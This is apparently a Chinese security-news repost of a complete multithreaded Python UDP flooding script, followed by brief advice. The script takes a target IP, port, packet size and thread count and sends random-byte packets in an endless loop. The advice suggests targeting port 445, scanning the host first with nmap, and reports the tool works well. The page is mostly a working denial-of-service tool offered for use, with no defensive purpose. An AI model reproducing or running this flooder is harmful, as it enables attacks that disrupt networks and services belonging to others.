首页 > 安全资讯 >

一个python版本多线程udp flooding的小程序

14-12-12

! usr bin python import socket import threading import random import sys

#!/usr/bin/python


import socket


import threading


import random


import sys





###########################################


#


# Author: sniker


# Contact: irc.eth0.info


#


# eth0 will prevail. || irc.eth0.info


#


############################################





class attack(threading.Thread):


    def __init__ (self, ip, port, psize):


        threading.Thread.__init__(self)


        self.ip = ip


        self.port = port


        self.psize = psize





    def run(self):


        print "Thread initiated, flooding " + self.ip + ":" + str(self.port) + "."


        sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)


        bytes = random._urandom(self.psize)


        while True:


            sock.sendto(bytes,(self.ip, self.port))








if len(sys.argv) < 2:


    print "Usage: "+ sys.argv[0] +" IP PORT(optional, default random) PACKETSIZE(optional 0-65500 default 1024) THREADS(optional default 10)"


    sys.exit()





try:


    threads = sys.argv[4]


except NameError:


    threads = 10


except IndexError:


    threads = 10





try:


    if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500:


        psize = int(sys.argv[3])


        print psize


    else:


        psize = 1024


except IndexError:


    psize = 1024








for host in range(int(threads)):


    try:


        port = sys.argv[2]


    except IndexError:


        port = random.randrange(1, 65535, 2)


    at = attack(sys.argv[1], int(port), int(psize))


    at.start()



比较常用的udp端口如445端口,也可以提前用nmap或者superscan扫一下目标主机

我自己测试效果还是很显著的。
 

 

相关文章
最新文章
热点推荐